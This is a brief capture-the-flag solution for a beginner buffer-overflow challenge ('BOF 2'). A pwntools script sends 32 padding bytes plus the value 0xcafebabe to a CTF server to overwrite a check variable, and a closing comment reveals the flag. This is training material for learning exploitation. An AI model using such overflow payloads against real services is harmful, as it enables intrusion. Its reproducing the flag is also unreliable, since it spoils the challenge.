BOF 2
Challenge
Solution
from pwn import remote, context
context.log_level = 'error'
client = remote('intro.ctfrei.fr', 7002)
client.recv(2048)
fill_buffer = b'A' * 32
check = 0xcafebabe.to_bytes(4, 'little')
client.sendline(fill_buffer + check)
print(client.recv(2048).decode())
# Félicitations ! Voici le flag : CTFREI{c4f3b4b3_0v3rwr1t3}Mis à jour